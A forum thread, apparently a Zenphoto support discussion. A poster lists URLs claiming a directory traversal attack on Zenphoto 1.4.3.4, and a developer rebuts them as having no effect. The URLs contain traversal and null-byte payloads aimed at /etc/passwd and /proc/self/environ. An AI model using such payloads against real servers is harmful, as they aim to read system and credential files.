Directory traversal attack
Zenphoto version 1.4.3.4 [10988]
search.php?action=search&type=../../../../../../../../../../proc/self/environ&where%5B%5D=keywords&keyword=redacted
search.php?action=search&type=detail&where%5B%5D=/../../../../../../../../../../etc/passwd%00&keyword=redacted
search.php?action=search&type=detail&where%5B%5D=keywords&keyword=/../../../../../../../../../../proc/self/environ%00
search.php?action=search&type=detail&where%5B%5D=keywords&keyword=/../../../../../../../../../../etc/passwd%00
index.php has been manipulated by adding - EXAMPLE:
[i]moderator's note: this message is probably spam, so I have redacted the keyword[/i]
What we seem to have here is a failure to communicate:
The only search.php script files of Zenphoto are all in their variouos theme folders, so will not be run with the above URIs. You will get a 404 error as did acrylian.
If they actually were run independently of the theme load process they would all abort immediately.
If they did not abort immediately they still do no processing of URI query parameters, so the above parameters would do nothing.
If somehow you did get to the search engine from those links, the parameters still would be meaningless. We have nowhere an "action" of "search". Search does not make any use of a parameter named "type" nor does it make use of any parameter "keyword" or "keywords".
So perhaps you can elaborate on just what you are trying to say here.